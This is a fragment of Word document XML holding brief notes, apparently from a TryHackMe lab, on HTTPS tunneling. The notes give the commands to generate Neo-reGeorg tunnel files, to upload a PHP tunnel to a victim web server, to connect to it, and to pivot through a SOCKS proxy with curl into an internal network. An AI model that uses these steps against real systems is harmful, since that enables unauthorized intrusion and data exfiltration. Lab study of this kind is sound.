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897B" w14:textId="77777777" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A">
      <w:r>
        <w:t xml:space="preserve">//How tom exfiltrate data using HTTPS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31641E02" w14:textId="77777777" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A"/>
    <w:p w14:paraId="68E002E6" w14:textId="77777777" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A">
      <w:r>
        <w:t xml:space="preserve">*On the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DC1907" w14:textId="77777777" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A">
      <w:r>
        <w:t xml:space="preserve">python3 neoreg.py generate -k </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>thm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB91BD4" w14:textId="77777777" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A">
      <w:r>
        <w:t>This will generate encrypted tunnel files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6D5846" w14:textId="77777777" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A"/>
    <w:p w14:paraId="7FE06179" w14:textId="77777777" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A">
      <w:r>
        <w:t>*On the victim machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E085C50" w14:textId="77777777" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A">
      <w:r>
        <w:t xml:space="preserve">Upload one of the tunnels on the victim </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Webserver</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="01CA3E8F" w14:textId="77777777" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A">
      <w:r>
        <w:t xml:space="preserve">Find the URL where the file is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poiting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to. ex: http://10.10.71.68/uploader/files/tunnel.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CEB117" w14:textId="77777777" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A"/>
    <w:p w14:paraId="026CA198" w14:textId="77777777" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A">
      <w:r>
        <w:t xml:space="preserve">*On the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7FED5B" w14:textId="77777777" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A">
      <w:r>
        <w:t xml:space="preserve">python3 neoreg.py -k </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>thm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u http://10.10.71.68/uploader/files/tunnel.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C18B2F" w14:textId="77777777" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A">
      <w:r>
        <w:t>This will connect to the victim that is hosting the tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060573BA" w14:textId="77777777" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A">
      <w:r>
        <w:t>curl --socks5 127.0.0.1:1080 http://172.20.0.121:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF9C169" w14:textId="0C78C846" w:rsidR="00FE3CD1" w:rsidRDefault="006A409A" w:rsidP="006A409A">
      <w:r>
        <w:t>This will use the socks proxy that we setup before and pivot to another machine that we wouldn't be able to access otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A7EDBD" w14:textId="15582A01" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A"/>
    <w:p w14:paraId="725020A2" w14:textId="08ECCE4D" w:rsidR="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is what we bypassed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F5909" w14:textId="2465FED9" w:rsidR="006A409A" w:rsidRPr="006A409A" w:rsidRDefault="006A409A" w:rsidP="006A409A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A409A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77EE9755" wp14:editId="7E14336F">
            <wp:extent cx="5731510" cy="131127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09A" w:rsidRPr="006A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B2"/>
    <w:rsid w:val="006A409A"/>
    <w:rsid w:val="007D1BB2"/>
    <w:rsid w:val="00FE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55391"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{62C62162-EACC-4F64-9663-EEB3EFB7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2023-03-01T10:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-01T10:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>